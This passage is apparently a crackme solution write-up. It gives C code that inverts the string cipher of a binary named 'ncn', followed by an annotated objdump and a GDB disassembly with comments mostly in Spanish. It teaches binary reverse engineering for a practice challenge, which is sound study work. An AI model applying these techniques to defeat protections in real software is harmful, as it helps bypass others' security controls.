char reversed[MAX_STR], str[MAX_STR];
//array taken from original crackme executable that is used to do the translations between numbers and letters
char alphabet[]={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};
//function reversed/regenerated from crackme binary that is used to tell which position of the array we are decrypting.
//i think CT (the author) just used it so that ncn binary encrypted strings in a non sequential way
int vacia(int len,int pivote){
        //printf("(%d,%d)",len,pivote);
        if(len >= pivote){
                if( cifred[pivote] == 0 ){
                        newpos=pivote;
                }
                else{
                        newpos=vacia(len, pivote+1);
                }
        }
        else{
                pivote = pivote - len;
                pivote = pivote - 1;
                if (cifred[pivote]==0){
                        newpos=pivote;
                }
                else{
                        newpos=vacia(len, pivote+1);
                }
        }
        return newpos;
}
//a study of the binary will reveal that the "encrypting engine" puts the seed used in the second position of the ciphered array
//this is cifred[1], thus this function gets that char placed in that position and returns its seed value translated using the
//alphabet array
int get_seed(char single_char){
        int result=61;
        for(i=0;i<62;i++){
                if(single_char==alphabet[i]){
                        result=i;
                }
        }
        return result;
}
//main funcion of the ncn decrypter
int main(int argc,char *argv[]) {
        if (argc != 2){
                printf("Error, provide ciphered text as the unique argument\n");
                exit(1);
        }
        len =  strlen(argv[1]);
        if ( len > MAX_STR) {
                printf("Error, ciphered text too long, it must be < %d \n",MAX_STR);
                exit(1);
        }
//trying avoiding buffer overflows
        strncpy(str,argv[1],len);
//this variable holds always the same value
        salto = 3;
//newpos is the position of the array we are working on, it will be changed according to "vacia" function output
        newpos = 1;
//we get the original seed used from the encrypted text passed
        seed_value = get_seed(str[1]);
//oops debug code, you can remove when compiling
        printf("seed=%d",seed_value);
//cifred array is just an array to simulate the original ncn code, it holds which positions of the encrypted text
//have been processed, cifred[i]=0 means not processed, cifred[i]=1 means processed
        for(i=0;i<len;i++) {
                cifred[i]=0;
        }
//as I mentioned position 1 of the encrypted text always holds the seed so we marked it as already processed
        cifred[1]=1;
//the main processing loop
        for(i=0;i<len-1;i++){
//check which position of the encrypted string we are processing
                newpos = vacia(len-1,salto+newpos);
//update that possition as processed
                cifred[newpos]=1;
//the greatest nonsense I managed to achieve (at least it worked and can be useful for other similar situations):
//when I was analyzing assembly code I could not find what the heck where some really weird instructions at the beginning
//and at the end of the code, what did a do? take them as a black box and pass this code the possible used and
//then match the ouput with the encrypted position we are dealing with each time
                for (j=0;j<62;j++){
//yeah its inline assembler, very useful though, %N, where n is a number is the Nth variable you have passed (seed_value in this case)
                        asm ( "mov    %3,%%eax;"
                        "add    %1,%%eax;"
                        "mov    %%eax,%%ecx;"
                        "add    %2,%%ecx;"
                        "mov    $0x84210843,%%eax;"
                        "imul   %%ecx;"
                        "lea    (%%edx,%%ecx,1),%%eax;"
                        "mov    %%eax,%%edx;"
                        "sar    $0x5,%%edx;"
                        "mov    %%ecx,%%eax;"
                        "sar    $0x1f,%%eax;"
                        "sub    %%eax,%%edx;"
                        "mov    %%edx,%%eax;"
                        "shl    $0x5,%%eax;"
                        "sub    %%edx,%%eax;"
                        "add    %%eax,%%eax;"
                        "sub    %%eax,%%ecx;"
                        "mov    %%ecx,%0;"
                        : "=m" (ciphered_index)
                        : "m" (j), "m" (increase), "m" (seed_value)
                        );
//you might be wondering what this "blackbox" of code does?? ok don't laugh, it generates the integer remainder of a division!!
//and it's damn clear that somewhere the binary needed this instructiong as the seed taken from "rand" function is too long
//and the seed must be a number between 0 and 61! therefore in c code all this lines in assembly mean "seed=rand()%62"
                        if ( alphabet[ciphered_index] == str[newpos] ){
                                reversed[procesed]=alphabet[j];
                        }
                                //fprintf("j=%d,crypt=%d,newpos=%c,str[newpos]=%calphabet=\n",j,ciphered_index,newpos,(char *) str[newpos],(char *)alphabet[ciphered_index]);
                }
// some computations to mimic the reversed binary behaviour
                increase=increase+5;
                procesed++;
        }
        reversed[procesed]=0;
//here it is!
        printf("String reversed is %s\n",reversed);
        return 0;
}

Solution code attachment:un_ncner.c

My even more dirty debugging files

Objdump file

ncn:     file format elf32-i386

Disassembly of section .init:

08048320 <_init>:
 8048320:       55                      push   %ebp
 8048321:       89 e5                   mov    %esp,%ebp
 8048323:       83 ec 08                sub    $0x8,%esp
 8048326:       e8 b9 00 00 00          call   80483e4 <call_gmon_start>
 804832b:       e8 20 01 00 00          call   8048450 <frame_dummy>
 8048330:       e8 eb 04 00 00          call   8048820 <__do_global_ctors_aux>
 8048335:       c9                      leave  
 8048336:       c3                      ret    
Disassembly of section .plt:

08048338 <time@plt-0x10>:
 8048338:       ff 35 f4 99 04 08       pushl  0x80499f4
 804833e:       ff 25 f8 99 04 08       jmp    *0x80499f8
 8048344:       00 00                   add    %al,(%eax)
        ...

08048348 <time@plt>:
 8048348:       ff 25 fc 99 04 08       jmp    *0x80499fc
 804834e:       68 00 00 00 00          push   $0x0
 8048353:       e9 e0 ff ff ff          jmp    8048338 <_init+0x18>

08048358 <strlen@plt>:
 8048358:       ff 25 00 9a 04 08       jmp    *0x8049a00
 804835e:       68 08 00 00 00          push   $0x8
 8048363:       e9 d0 ff ff ff          jmp    8048338 <_init+0x18>

08048368 <__libc_start_main@plt>:
 8048368:       ff 25 04 9a 04 08       jmp    *0x8049a04
 804836e:       68 10 00 00 00          push   $0x10
 8048373:       e9 c0 ff ff ff          jmp    8048338 <_init+0x18>

08048378 <printf@plt>:
 8048378:       ff 25 08 9a 04 08       jmp    *0x8049a08
 804837e:       68 18 00 00 00          push   $0x18
 8048383:       e9 b0 ff ff ff          jmp    8048338 <_init+0x18>

08048388 <srand@plt>:
 8048388:       ff 25 0c 9a 04 08       jmp    *0x8049a0c
 804838e:       68 20 00 00 00          push   $0x20
 8048393:       e9 a0 ff ff ff          jmp    8048338 <_init+0x18>

08048398 <strncpy@plt>:
 8048398:       ff 25 10 9a 04 08       jmp    *0x8049a10
 804839e:       68 28 00 00 00          push   $0x28
 80483a3:       e9 90 ff ff ff          jmp    8048338 <_init+0x18>

080483a8 <rand@plt>:
 80483a8:       ff 25 14 9a 04 08       jmp    *0x8049a14
 80483ae:       68 30 00 00 00          push   $0x30
 80483b3:       e9 80 ff ff ff          jmp    8048338 <_init+0x18>
Disassembly of section .text:

080483c0 <_start>:
 80483c0:       31 ed                   xor    %ebp,%ebp
 80483c2:       5e                      pop    %esi
 80483c3:       89 e1                   mov    %esp,%ecx
 80483c5:       83 e4 f0                and    $0xfffffff0,%esp
 80483c8:       50                      push   %eax
 80483c9:       54                      push   %esp
 80483ca:       52                      push   %edx
 80483cb:       68 15 88 04 08          push   $0x8048815
 80483d0:       68 b0 87 04 08          push   $0x80487b0
 80483d5:       51                      push   %ecx
 80483d6:       56                      push   %esi
 80483d7:       68 d4 84 04 08          push   $0x80484d4
 80483dc:       e8 87 ff ff ff          call   8048368 <__libc_start_main@plt>
 80483e1:       f4                      hlt    
 80483e2:       90                      nop    

08048484 <vacia>:
 8048484:       55                      push   %ebp
 8048485:       89 e5                   mov    %esp,%ebp
 8048487:       83 ec 0c                sub    $0xc,%esp; subimos el esp 11 bytes
 804848a:       8b 45 08                mov    0x8(%ebp),%eax;metemos salto+newpos en eax 
 804848d:       3b 45 0c                cmp    0xc(%ebp),%eax; comparamos longitud con salto+newpos 
 8048490:       7e 0c                   jle    804849e <vacia+0x1a>;si longitud<salto+newpos vamos a salto1
 8048492:       8b 55 0c                mov    0xc(%ebp),%edx;mettemos longitud en edx
 8048495:       8b 45 08                mov    0x8(%ebp),%eax; metemos salto+newpos en eax
 8048498:       29 d0                   sub    %edx,%eax; restamos ambos registros 
 804849a:       48                      dec    %eax ; decrementamos en 1
 804849b:       89 45 08                mov    %eax,0x8(%ebp);guardamos el resultado como posible valor de retorno 
salto1
 804849e:       8b 45 08                mov    0x8(%ebp),%eax;
 80484a1:       05 20 9b 04 08          add    $0x8049b20,%eax;indice cifred(eax)
 80484a6:       80 38 30                cmpb   $0x30,(%eax); cifred(eax) ==48
 80484a9:       75 08                   jne    80484b3 <vacia+0x2f>; llamamos recursivamente a vacia
 80484ab:       8b 45 08                mov    0x8(%ebp),%eax; hacemos los preparativos para salir de la funcion
 80484ae:       89 45 fc                mov    %eax,-0x4(%ebp)
 80484b1:       eb 1c                   jmp    80484cf <vacia+0x4b>; salimos de la funcion
 80484b3:       8b 45 0c                mov    0xc(%ebp),%eax;preparacion para llamaa recursiva
de vacia(param1,param2)
 80484b6:       89 44 24 04             mov    %eax,0x4(%esp)
 80484ba:       8b 45 08                mov    0x8(%ebp),%eax
 80484bd:       40                      inc    %eax
 80484be:       89 04 24                mov    %eax,(%esp)
 80484c1:       e8 be ff ff ff          call   8048484 <vacia>
 80484c6:       89 45 08                mov    %eax,0x8(%ebp); gilipolleces? antes de salir de la funcion
 80484c9:       8b 45 08                mov    0x8(%ebp),%eax
 80484cc:       89 45 fc                mov    %eax,-0x4(%ebp)
 80484cf:       8b 45 fc                mov    -0x4(%ebp),%eax
 80484d2:       c9                      leave  
 80484d3:       c3                      ret    

080484d4 <main>:
 80484d4:       55                      push   %ebp
 80484d5:       89 e5                   mov    %esp,%ebp
 80484d7:       53                      push   %ebx
 80484d8:       83 ec 14                sub    $0x14,%esp
 80484db:       83 e4 f0                and    $0xfffffff0,%esp;alineamiento del esp???
 80484de:       b8 00 00 00 00          mov    $0x0,%eax;movemos 0 a eax
 80484e3:       29 c4                   sub    %eax,%esp; restamos 0 a esp??
 80484e5:       c7 45 f8 40 9a 04 08    movl   $0x8049a40,-0x8(%ebp);en la posición -8 en relacion al ebp ubicamos un alfabeto alfanumerico (array min(90))
 80484ec:       c7 05 a8 9a 04 08 02    movl   $0x2,0x8049aa8; simbolo semilla 
 80484f3:       00 00 00 
 80484f6:       c7 05 b4 9a 04 08 03    movl   $0x3,0x8049ab4; simbolo salto no varia en tol programa
 80484fd:       00 00 00 
 8048500:       c7 05 a0 9a 04 08 01    movl   $0x1,0x8049aa0; simbolo newpos
 8048507:       00 00 00 
 804850a:       c7 05 74 9b 04 08 00    movl   $0x0,0x8049b74; simbolo procesadas
 8048511:       00 00 00 
 8048514:       c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 804851b:       e8 28 fe ff ff          call   8048348 <time@plt> ; time devuelve los ticks del programa=1242518429, los 6 ultimos digitos varian
 8048520:       89 04 24                mov    %eax,(%esp);movemos el resultado a la pila
 8048523:       e8 60 fe ff ff          call   8048388 <srand@plt>; con lo que tenemos en la pila llamamos a generar semilla
 8048528:       c7 05 70 9b 04 08 05    movl   $0x5,0x8049b70; variable increase=5
 804852f:       00 00 00 
 8048532:       e8 71 fe ff ff          call   80483a8 <rand@plt>
 8048537:       89 c1                   mov    %eax,%ecx ; pasamos el resutlado de rand al registro ecx el número es totalmente aleatorio
 8048539:       b8 43 08 21 84          mov    $0x84210843,%eax; movemos este valor fijo a eax
 804853e:       f7 e9                   imul   %ecx; multiplicamos la salida de rand por el valor fijo y guardamos el resultado en eax
 8048540:       8d 04 0a                lea    (%edx,%ecx,1),%eax; movemos edx+ecx->eax
 8048543:       89 c2                   mov    %eax,%edx; 
 8048545:       c1 fa 05                sar    $0x5,%edx;dividimos edx=eax por 32 y lo guardamos en edx
 8048548:       89 c8                   mov    %ecx,%eax; lo dejamos en eax
 804854a:       c1 f8 1f                sar    $0x1f,%eax;multiplicamos eax por 2^31
 804854d:       29 c2                   sub    %eax,%edx;edx=edx-eax
 804854f:       89 d0                   mov    %edx,%eax
 8048551:       a3 a8 9a 04 08          mov    %eax,0x8049aa8; movemos el eax en el simbolo semilla
 8048556:       8b 15 a8 9a 04 08       mov    0x8049aa8,%edx;sacamos el simbolo semilla al edx
 804855c:       89 d0                   mov    %edx,%eax
 804855e:       c1 e0 05                shl    $0x5,%eax
 8048561:       29 d0                   sub    %edx,%eax
 8048563:       01 c0                   add    %eax,%eax
 8048565:       29 c1                   sub    %eax,%ecx
 8048567:       89 c8                   mov    %ecx,%eax
 8048569:       a3 a8 9a 04 08          mov    %eax,0x8049aa8; volvemos a mover eax a la variable semilla suele ser un valor entre 0-60??
 804856e:       83 7d 08 02             cmpl   $0x2,0x8(%ebp); como podemos comprobar esto solo se trata de la tipica comprobacion de if $#=2 then ok else wrong parameters
 8048572:       74 1a                   je     804858e <main+0xba>; si es igual vamos a salto858e
 8048574:       8b 45 0c                mov    0xc(%ebp),%eax
 8048577:       8b 00                   mov    (%eax),%eax
 8048579:       89 44 24 04             mov    %eax,0x4(%esp)
 804857d:       c7 04 24 a0 88 04 08    movl   $0x80488a0,(%esp) ; sintaxis incorrecta
 8048584:       e8 ef fd ff ff          call   8048378 <printf@plt>
 8048589:       e9 18 02 00 00          jmp    80487a6 <main+0x2d2>; sale del programa
salto858e:
 804858e:       c7 04 24 c9 88 04 08    movl   $0x80488c9,(%esp)
 8048595:       e8 de fd ff ff          call   8048378 <printf@plt>; sintaxis OK
 804859a:       8b 45 0c                mov    0xc(%ebp),%eax; metemos la direccion de la cadena pasada ...posteriormente le sumamos 4?? no seria mejor lea 0xc+4(%ebp),eax 
 804859d:       83 c0 04                add    $0x4,%eax
 80485a0:       8b 00                   mov    (%eax),%eax
 80485a2:       89 04 24                mov    %eax,(%esp);lo dejamos en esp
 80485a5:       e8 ae fd ff ff          call   8048358 <strlen@plt>
 80485aa:       83 f8 03                cmp    $0x3,%eax; si la longitud es mayor que 3 saltamos 
 80485ad:       77 19                   ja     80485c8 <main+0xf4>
 80485af:       c7 44 24 04 04 00 00    movl   $0x4,0x4(%esp); mostramos que la longitud debe ser mayuor que 3 y salimos
 80485b6:       00 
 80485b7:       c7 04 24 d6 88 04 08    movl   $0x80488d6,(%esp)
 80485be:       e8 b5 fd ff ff          call   8048378 <printf@plt>
 80485c3:       e9 d5 01 00 00          jmp    804879d <main+0x2c9>
 80485c8:       8b 45 0c                mov    0xc(%ebp),%eax; metemos en esp la direccion de la cadena a cifrar para comprobar su longitud
 80485cb:       83 c0 04                add    $0x4,%eax
 80485ce:       8b 00                   mov    (%eax),%eax
 80485d0:       89 04 24                mov    %eax,(%esp)
 80485d3:       e8 80 fd ff ff          call   8048358 <strlen@plt>
 80485d8:       83 f8 4f                cmp    $0x4f,%eax
 80485db:       76 2c                   jbe    8048609 <main+0x135>; si la cadena es menor que 0x4f=79 (quizas la longitud de los arrays para cifrado) saltamos a la tag linea 309 sino continuamos
 80485dd:       c7 05 ac 9a 04 08 50    movl   $0x50,0x8049aac
 80485e4:       00 00 00 
 80485e7:       c7 44 24 08 50 00 00    movl   $0x50,0x8(%esp)
 80485ee:       00 
 80485ef:       8b 45 0c                mov    0xc(%ebp),%eax
 80485f2:       83 c0 04                add    $0x4,%eax
 80485f5:       8b 00                   mov    (%eax),%eax
 80485f7:       89 44 24 04             mov    %eax,0x4(%esp)
 80485fb:       c7 04 24 c0 9a 04 08    movl   $0x8049ac0,(%esp)
 8048602:       e8 91 fd ff ff          call   8048398 <strncpy@plt>
 8048607:       eb 35                   jmp    804863e <main+0x16a>
linea 309:
 8048609:       8b 45 0c                mov    0xc(%ebp),%eax;sacamos la cadena introducida para pasarla a strlen
 804860c:       83 c0 04                add    $0x4,%eax
 804860f:       8b 00                   mov    (%eax),%eax
 8048611:       89 04 24                mov    %eax,(%esp)
 8048614:       e8 3f fd ff ff          call   8048358 <strlen@plt>
 8048619:       a3 ac 9a 04 08          mov    %eax,0x8049aac; la longitud la guardamos en esta posición que concuerda con el simbolo length
 804861e:       c7 44 24 08 50 00 00    movl   $0x50,0x8(%esp); metemos en la pila el numero 80...cifred?
 8048625:       00 
 8048626:       8b 45 0c                mov    0xc(%ebp),%eax
 8048629:       83 c0 04                add    $0x4,%eax
 804862c:       8b 00                   mov    (%eax),%eax
 804862e:       89 44 24 04             mov    %eax,0x4(%esp)
 8048632:       c7 04 24 c0 9a 04 08    movl   $0x8049ac0,(%esp)
 8048639:       e8 5a fd ff ff          call   8048398 <strncpy@plt>; llamamos a strncpy para que copie 80 caracteres de la cadena pasada a clear 
804863e:        c7 05 10 9b 04 08 00    movl   $0x0,0x8049b10; ponemos el contador "i" a 0
salto 3:
 8048645:       00 00 00 
 8048648:       a1 10 9b 04 08          mov    0x8049b10,%eax; eax="i"
 804864d:       3b 05 ac 9a 04 08       cmp    0x8049aac,%eax; comparamos i con length
 8048653:       7e 02                   jle    8048657 <main+0x183>;si "i" < "length" saltamos detras del siguiente jmp
 8048655:       eb 15                   jmp    804866c <main+0x198>;sino vamos a salto2 
 8048657:       a1 10 9b 04 08          mov    0x8049b10,%eax; metemos en eax el contador "i"
 804865c:       05 20 9b 04 08          add    $0x8049b20,%eax; sumamos el valor de i con cifred[0]= esto es para indexar en el array cifred!!
 8048661:       c6 00 30                movb   $0x30,(%eax); metemos 48d en esa posici0n
 8048664:       ff 05 10 9b 04 08       incl   0x8049b10; incrementamos i
 804866a:       eb dc                   jmp    8048648 <main+0x174>: tiramos patras a donde se pone "i" a 0 (salto3)
salto2:
 804866c:       a1 ac 9a 04 08          mov    0x8049aac,%eax; metemos la longitud en eax
 8048671:       05 21 9b 04 08          add    $0x8049b21,%eax ;preparamos el indice para apuntar a cifred+length+1 
 8048676:       c6 00 00                movb   $0x0,(%eax); ponemos a cifred[length+1] a 0
 8048679:       c7 05 10 9b 04 08 00    movl   $0x0,0x8049b10; le asignamos a i el valor 0
 8048680:       00 00 00 
 8048683:       a1 a8 9a 04 08          mov    0x8049aa8,%eax; se guarda el valor semilla en eax
 8048688:       05 40 9a 04 08          add    $0x8049a40,%eax; se indexa min(semilla)
 804868d:       0f b6 00                movzbl (%eax),%eax;guarda en eax el contenido de la posición de memoria min(semilla) y ademas como es un byte se rellena el destino con 0s a la izquierda
 8048690:       a2 21 9b 04 08          mov    %al,0x8049b21; mueve un byte, supuestamente min(semilla)-> a cifred(1)
 8048695:       c7 05 10 9b 04 08 00    movl   $0x0,0x8049b10; i=0;
 804869c:       00 00 00 
salto869f:
 804869f:       a1 10 9b 04 08          mov    0x8049b10,%eax; movemos i al eax
 80486a4:       3b 05 ac 9a 04 08       cmp    0x8049aac,%eax; comparamos i con la longitud
 80486aa:       7c 05                   jl     80486b1 <main+0x1dd>; si es menor vamos a la linea de despues del jmp 
 80486ac:       e9 cb 00 00 00          jmp    804877c <main+0x2a8>; si i>=length vamos al final para mostrar la cadena cifrada 
 80486b1:       a1 ac 9a 04 08          mov    0x8049aac,%eax ; ponemos la longitud de la caden en eax
 80486b6:       89 44 24 04             mov    %eax,0x4(%esp); de eax la pasamos a la pila en esp+4
 80486ba:       a1 b4 9a 04 08          mov    0x8049ab4,%eax;movemos la variable salto que vale 3 al eax
 80486bf:       03 05 a0 9a 04 08       add    0x8049aa0,%eax;sumamos salto+newpos donde newpos vale 1
 80486c5:       89 04 24                mov    %eax,(%esp); movemos salto+newpos a la pila
 80486c8:       e8 b7 fd ff ff          call   8048484 <vacia>
 80486cd:       a3 a0 9a 04 08          mov    %eax,0x8049aa0; vacia nos devuelvve una un nuevo newpos que guardamos en su posicion de mem asignada
 80486d2:       c7 05 a4 9a 04 08 00    movl   $0x0,0x8049aa4; ponemos a la variable j 
 80486d9:       00 00 00 
salto86dc:
 80486dc:       c7 04 24 40 9a 04 08    movl   $0x8049a40,(%esp); se mete (min) en el la pila 
 80486e3:       e8 70 fc ff ff          call   8048358 <strlen@plt>; esto siempre deberia valer 90
 80486e8:       39 05 a4 9a 04 08       cmp    %eax,0x8049aa4; comparamos con j
 80486ee:       72 02                   jb     80486f2 <main+0x21e>; si j es mayor vamos a la posicion siguiente al jmp 
 80486f0:       eb 27                   jmp    8048719 <main+0x245>; sino vamos a salto 8719 
 80486f2:       a1 a4 9a 04 08          mov    0x8049aa4,%eax; movemos j a eax
 80486f7:       05 40 9a 04 08          add    $0x8049a40,%eax; creamos el indice min(j)
 80486fc:       8b 15 74 9b 04 08       mov    0x8049b74,%edx; metemos la variable procesadas en edx 
 8048702:       81 c2 c0 9a 04 08       add    $0x8049ac0,%edx; creamos el indice clear(procesadas)
 8048708:       0f b6 00                movzbl (%eax),%eax; metemos el byte min(j)->eax
 804870b:       3a 02                   cmp    (%edx),%al; comparamos los bytes min(j),clear(procesadas)
 804870d:       75 02                   jne    8048711 <main+0x23d>;si no fuesen iguales saltamos despues de jmp siguiente 
 804870f:       eb 08                   jmp    8048719 <main+0x245>; saltamos al tag salto8719
 8048711:       ff 05 a4 9a 04 08       incl   0x8049aa4; incrementeamos "j"
 8048717:       eb c3                   jmp    80486dc <main+0x208>; volvemos al tag donde se mete min en la pila para hacer un strlen
salto8719:
 8048719:       8b 1d a0 9a 04 08       mov    0x8049aa0,%ebx; metemos newpos (deberia haberse actualizado tras vacia) en ebx 
 804871f:       81 c3 20 9b 04 08       add    $0x8049b20,%ebx; indice cifred(newpos) 
 8048725:       a1 a8 9a 04 08          mov    0x8049aa8,%eax; movemos la variable semilla en el eax
 804872a:       03 05 a4 9a 04 08       add    0x8049aa4,%eax; sumamos semilla+j
 8048730:       89 c1                   mov    %eax,%ecx; el resultado lo guardamos en ecx
 8048732:       03 0d 70 9b 04 08       add    0x8049b70,%ecx;sumamos increase+semilla+j
 8048738:       b8 43 08 21 84          mov    $0x84210843,%eax; movemos un valor hardcodeado en eax
 804873d:       f7 e9                   imul   %ecx; lo multiplicamos por la suma increase+j+semilla
 804873f:       8d 04 0a                lea    (%edx,%ecx,1),%eax; metemos en eax la direccion generada de edx=clear(procesadas+ecx)
 8048742:       89 c2                   mov    %eax,%edx; de ahi a edx pq eax sera sobre escrito por la siguiente instruccion??o no??
 8048744:       c1 fa 05                sar    $0x5,%edx;dividimos por 32 pq es un shift right ademas de forma aritmetica para conservar el signo 
 8048747:       89 c8                   mov    %ecx,%eax; metemos en eax el vallor de la operacion imul con ecx anterior
 8048749:       c1 f8 1f                sar    $0x1f,%eax; dividimos por 2^31=2147483648
 804874c:       29 c2                   sub    %eax,%edx; le restamos edx
 804874e:       89 d0                   mov    %edx,%eax; el resultado va a eax
 8048750:       c1 e0 05                shl    $0x5,%eax; ahora multiplicamos eax por 32
 8048753:       29 d0                   sub    %edx,%eax; restamos eax 
 8048755:       01 c0                   add    %eax,%eax
 8048757:       29 c1                   sub    %eax,%ecx
 8048759:       89 c8                   mov    %ecx,%eax
 804875b:       0f b6 80 40 9a 04 08    movzbl 0x8049a40(%eax),%eax
 8048762:       88 03                   mov    %al,(%ebx); guardamos el resultado de al en cifred(newpos) 
 8048764:       ff 05 74 9b 04 08       incl   0x8049b74; incrementamos procesadas
 804876a:       83 05 70 9b 04 08 05    addl   $0x5,0x8049b70; increase+5
 8048771:       ff 05 10 9b 04 08       incl   0x8049b10;incrementamos "i"
 8048777:       e9 23 ff ff ff          jmp    804869f <main+0x1cb>; volvemos a salto869f 

 804877c:       a1 ac 9a 04 08          mov    0x8049aac,%eax ; terminar la cadena en 0??
 8048781:       05 21 9b 04 08          add    $0x8049b21,%eax
 8048786:       c6 00 00                movb   $0x0,(%eax)
 8048789:       c7 44 24 04 20 9b 04    movl   $0x8049b20,0x4(%esp)
 8048790:       08 
 8048791:       c7 04 24 ee 88 04 08    movl   $0x80488ee,(%esp)
 8048798:       e8 db fb ff ff          call   8048378 <printf@plt>; se muestra la cdena encriptada es y el valor del array cifred
 804879d:       c7 45 f4 00 00 00 00    movl   $0x0,-0xc(%ebp); se pone a cero una word de la pila
 80487a4:       eb 00                   jmp    80487a6 <main+0x2d2>; se salta a la sigiuente linea?
 80487a6:       8b 45 f4                mov    -0xc(%ebp),%eax; se mueve a eax un valor, sugpongo que el codigo de salida del programa?? 
 80487a9:       8b 5d fc                mov    -0x4(%ebp),%ebx
 80487ac:       c9                      leave  
 80487ad:       c3                      ret    
 80487ae:       90                      nop    
 80487af:       90                      nop

GDB dump

Dump of assembler code for function main:
0x080484d4 <main+0>:    push   %ebp
0x080484d5 <main+1>:    mov    %esp,%ebp
0x080484d7 <main+3>:    push   %ebx
0x080484d8 <main+4>:    sub    $0x14,%esp
0x080484db <main+7>:    and    $0xfffffff0,%esp
0x080484de <main+10>:   mov    $0x0,%eax
0x080484e3 <main+15>:   sub    %eax,%esp
0x080484e5 <main+17>:   movl   $0x8049a40,0xfffffff8(%ebp)
0x080484ec <main+24>:   movl   $0x2,0x8049aa8
0x080484f6 <main+34>:   movl   $0x3,0x8049ab4
0x08048500 <main+44>:   movl   $0x1,0x8049aa0
0x0804850a <main+54>:   movl   $0x0,0x8049b74
0x08048514 <main+64>:   movl   $0x0,(%esp)
0x0804851b <main+71>:   call   0x8048348 <time@plt>
0x08048520 <main+76>:   mov    %eax,(%esp)
0x08048523 <main+79>:   call   0x8048388 <srand@plt>
0x08048528 <main+84>:   movl   $0x5,0x8049b70
0x08048532 <main+94>:   call   0x80483a8 <rand@plt>
0x08048537 <main+99>:   mov    %eax,%ecx
0x08048539 <main+101>:  mov    $0x84210843,%eax
0x0804853e <main+106>:  imul   %ecx
0x08048540 <main+108>:  lea    (%edx,%ecx,1),%eax
0x08048543 <main+111>:  mov    %eax,%edx
0x08048545 <main+113>:  sar    $0x5,%edx
0x08048548 <main+116>:  mov    %ecx,%eax
0x0804854a <main+118>:  sar    $0x1f,%eax
0x0804854d <main+121>:  sub    %eax,%edx
0x0804854f <main+123>:  mov    %edx,%eax
0x08048551 <main+125>:  mov    %eax,0x8049aa8
0x08048556 <main+130>:  mov    0x8049aa8,%edx
0x0804855c <main+136>:  mov    %edx,%eax
0x0804855e <main+138>:  shl    $0x5,%eax
0x08048561 <main+141>:  sub    %edx,%eax
0x08048563 <main+143>:  add    %eax,%eax
0x08048565 <main+145>:  sub    %eax,%ecx
0x08048567 <main+147>:  mov    %ecx,%eax
0x08048569 <main+149>:  mov    %eax,0x8049aa8
0x0804856e <main+154>:  cmpl   $0x2,0x8(%ebp)
0x08048572 <main+158>:  je     0x804858e <main+186>
0x08048574 <main+160>:  mov    0xc(%ebp),%eax
0x08048577 <main+163>:  mov    (%eax),%eax
0x08048579 <main+165>:  mov    %eax,0x4(%esp)
0x0804857d <main+169>:  movl   $0x80488a0,(%esp)
0x08048584 <main+176>:  call   0x8048378 <printf@plt>
0x08048589 <main+181>:  jmp    0x80487a6 <main+722>
0x0804858e <main+186>:  movl   $0x80488c9,(%esp)
0x08048595 <main+193>:  call   0x8048378 <printf@plt>
0x0804859a <main+198>:  mov    0xc(%ebp),%eax
0x0804859d <main+201>:  add    $0x4,%eax
0x080485a0 <main+204>:  mov    (%eax),%eax
0x080485a2 <main+206>:  mov    %eax,(%esp)
0x080485a5 <main+209>:  call   0x8048358 <strlen@plt>
0x080485aa <main+214>:  cmp    $0x3,%eax
0x080485ad <main+217>:  ja     0x80485c8 <main+244>
0x080485af <main+219>:  movl   $0x4,0x4(%esp)
0x080485b7 <main+227>:  movl   $0x80488d6,(%esp)
0x080485be <main+234>:  call   0x8048378 <printf@plt>
0x080485c3 <main+239>:  jmp    0x804879d <main+713>
0x080485c8 <main+244>:  mov    0xc(%ebp),%eax
0x080485cb <main+247>:  add    $0x4,%eax
0x080485ce <main+250>:  mov    (%eax),%eax
0x080485d0 <main+252>:  mov    %eax,(%esp)
0x080485d3 <main+255>:  call   0x8048358 <strlen@plt>
0x080485d8 <main+260>:  cmp    $0x4f,%eax
0x080485db <main+263>:  jbe    0x8048609 <main+309>
0x080485dd <main+265>:  movl   $0x50,0x8049aac
0x080485e7 <main+275>:  movl   $0x50,0x8(%esp)
0x080485ef <main+283>:  mov    0xc(%ebp),%eax
0x080485f2 <main+286>:  add    $0x4,%eax
0x080485f5 <main+289>:  mov    (%eax),%eax
0x080485f7 <main+291>:  mov    %eax,0x4(%esp)
0x080485fb <main+295>:  movl   $0x8049ac0,(%esp)
0x08048602 <main+302>:  call   0x8048398 <strncpy@plt>
0x08048607 <main+307>:  jmp    0x804863e <main+362>
0x08048609 <main+309>:  mov    0xc(%ebp),%eax
0x0804860c <main+312>:  add    $0x4,%eax
0x0804860f <main+315>:  mov    (%eax),%eax
0x08048611 <main+317>:  mov    %eax,(%esp)
0x08048614 <main+320>:  call   0x8048358 <strlen@plt>
0x08048619 <main+325>:  mov    %eax,0x8049aac
0x0804861e <main+330>:  movl   $0x50,0x8(%esp)
0x08048626 <main+338>:  mov    0xc(%ebp),%eax
0x08048629 <main+341>:  add    $0x4,%eax
0x0804862c <main+344>:  mov    (%eax),%eax
0x0804862e <main+346>:  mov    %eax,0x4(%esp)
0x08048632 <main+350>:  movl   $0x8049ac0,(%esp)
0x08048639 <main+357>:  call   0x8048398 <strncpy@plt>
0x0804863e <main+362>:  movl   $0x0,0x8049b10
0x08048648 <main+372>:  mov    0x8049b10,%eax
0x0804864d <main+377>:  cmp    0x8049aac,%eax
0x08048653 <main+383>:  jle    0x8048657 <main+387>
0x08048655 <main+385>:  jmp    0x804866c <main+408>
0x08048657 <main+387>:  mov    0x8049b10,%eax
0x0804865c <main+392>:  add    $0x8049b20,%eax
0x08048661 <main+397>:  movb   $0x30,(%eax)
0x08048664 <main+400>:  incl   0x8049b10
0x0804866a <main+406>:  jmp    0x8048648 <main+372>
0x0804866c <main+408>:  mov    0x8049aac,%eax
0x08048671 <main+413>:  add    $0x8049b21,%eax
0x08048676 <main+418>:  movb   $0x0,(%eax)
0x08048679 <main+421>:  movl   $0x0,0x8049b10
0x08048683 <main+431>:  mov    0x8049aa8,%eax
0x08048688 <main+436>:  add    $0x8049a40,%eax
0x0804868d <main+441>:  movzbl (%eax),%eax
0x08048690 <main+444>:  mov    %al,0x8049b21
0x08048695 <main+449>:  movl   $0x0,0x8049b10
0x0804869f <main+459>:  mov    0x8049b10,%eax
0x080486a4 <main+464>:  cmp    0x8049aac,%eax
0x080486aa <main+470>:  jl     0x80486b1 <main+477>
